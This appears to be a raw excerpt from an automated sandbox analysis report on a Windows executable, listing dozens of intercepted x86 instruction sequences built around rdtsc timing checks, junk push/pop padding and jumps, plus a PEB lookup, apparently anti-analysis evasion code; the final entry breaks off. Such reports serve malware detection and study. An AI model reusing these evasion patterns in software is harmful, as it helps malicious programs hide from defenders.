Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A89568 second address: A895AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA796h 0x0000000b jmp 00007FE1010EA796h 0x00000010 popad 0x00000011 jc 00007FE1010EA79Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007FE1010EA786h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A8913D second address: A89166 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE100E17066h 0x00000008 jmp 00007FE100E17079h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A89166 second address: A8916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A9866E second address: A98674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A98674 second address: A986A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE1010EA791h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FE1010EA78Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FE1010EA786h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A986A3 second address: A986B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FE100E1706Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A982E3 second address: A982F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE1010EA786h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A982F4 second address: A982F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A982F8 second address: A98338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE1010EA79Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FE1010EA786h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A98338 second address: A98353 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE100E17073h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A98353 second address: A9835B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A9835B second address: A9835F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A9835F second address: A98369 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE1010EA786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A9C9D9 second address: A9C9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 je 00007FE100E17066h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: A9C9EA second address: A9C9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA151E second address: AA1543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FE100E1706Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d jl 00007FE100E17066h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA1543 second address: AA154E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE1010EA786h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41C1 second address: AA41CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41CE second address: AA41D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41D4 second address: AA41DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41DC second address: AA41E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41E2 second address: AA41E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA41E7 second address: AA420D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE1010EA799h 0x0000000a jp 00007FE1010EA786h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA772C second address: AA7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AA7738 second address: AA773C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB194E second address: AB1953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB1953 second address: AB1958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB1958 second address: AB195E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB5EC5 second address: AB5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB5ECB second address: AB5ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB62F1 second address: AB62F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB62F5 second address: AB62FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB62FB second address: AB6320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE1010EA799h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB6320 second address: AB6324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB6324 second address: AB6328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB6328 second address: AB632E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB64A7 second address: AB64F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FE1010EA78Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FE1010EA79Ch 0x0000001a jmp 00007FE1010EA796h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FE1010EA78Bh 0x00000028 jmp 00007FE1010EA78Bh 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB64F9 second address: AB6500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB67BE second address: AB67E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE1010EA786h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FE1010EA791h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB67E7 second address: AB67F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB67F3 second address: AB67F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB67F9 second address: AB6802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB72CA second address: AB72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB72CE second address: AB72D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AB72D2 second address: AB72DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABA6CF second address: ABA6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABA6D3 second address: ABA6D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABCDBC second address: ABCDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FE100E17070h 0x0000000f jmp 00007FE100E17072h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABCDEA second address: ABCDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE1010EA78Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABCDFD second address: ABCE03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABCE03 second address: ABCE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1010EA790h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FE1010EA78Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FE1010EA793h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABF6EE second address: ABF6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABF6F2 second address: ABF6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: ABF6F8 second address: ABF6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: AFA552 second address: AFA557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B034B8 second address: B034BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B10D31 second address: B10D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B10D35 second address: B10D49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE100E1706Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B10D49 second address: B10D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B1277A second address: B12797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FE100E17074h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B12797 second address: B127A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B127A1 second address: B127AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B127AA second address: B127AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B127AE second address: B127DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jc 00007FE100E17066h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FE100E17076h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: B127DE second address: B127E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BDF3EC second address: BDF41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17073h 0x00000009 jmp 00007FE100E17079h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BDF6D0 second address: BDF6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BDFBAD second address: BDFBC5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE100E17072h 0x00000008 jns 00007FE100E17066h 0x0000000e jc 00007FE100E17066h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BDFD1D second address: BDFD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BDFD27 second address: BDFD71 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE100E17066h 0x00000008 jmp 00007FE100E17071h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007FE100E17066h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FE100E1706Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 jmp 00007FE100E17072h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE0086 second address: BE0091 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FE1010EA786h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE0091 second address: BE009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE009A second address: BE00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE45D0 second address: BE45D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE47C1 second address: BE47C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE47C7 second address: BE47DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE100E1706Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE47DF second address: BE47F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA792h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE47F5 second address: BE47F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE47F9 second address: BE483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FE1010EA788h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jnl 00007FE1010EA788h 0x00000029 push 00000004h 0x0000002b js 00007FE1010EA78Ch 0x00000031 or dword ptr [ebp+12B73733h], ebx 0x00000037 push C7D5A989h 0x0000003c pushad 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE5EC3 second address: BE5EC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE5EC9 second address: BE5ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE7E55 second address: BE7E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FE100E17073h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: BE7E70 second address: BE7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: 6EE0008 second address: 6EE0022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE100E1706Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: 6EE0022 second address: 6EE0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE1010EA797h 0x00000011 add si, E31Eh 0x00000016 jmp 00007FE1010EA799h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FE1010EA78Eh 0x00000024 sub ax, 7118h 0x00000029 jmp 00007FE1010EA78Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: 6EE0092 second address: 6EE00A1 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov dh, 28h 0x0000000b push eax 0x0000000c push edx 0x0000000d mov edi, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe RDTSC instruction interceptor: First address: 6EE00A1 second address: 6EE0196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE1010EA78Eh 0x00000013 and si, F5D8h 0x00000018 jmp 00007FE1010EA78Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FE1010EA796h 0x00000025 and si, 4038h 0x0000002a jmp 00007FE1010EA78Bh 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 popad 0x00000034 mov eax, dword ptr fs:[00000030h] 0x0000003a jmp 00007FE1010EA794h 0x0000003f sub esp, 18h 0x00000042 jmp 00007FE1010EA790h 0x00000047 xchg eax, ebx 0x00000048 jmp 00007FE1010EA790h 0x0000004d push eax 0x0000004e jmp 00007FE1010EA78Bh 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 mov ecx, 0AD95A4Bh 0x0000005a pushfd 0x0000005b jmp 00007FE1010EA790h 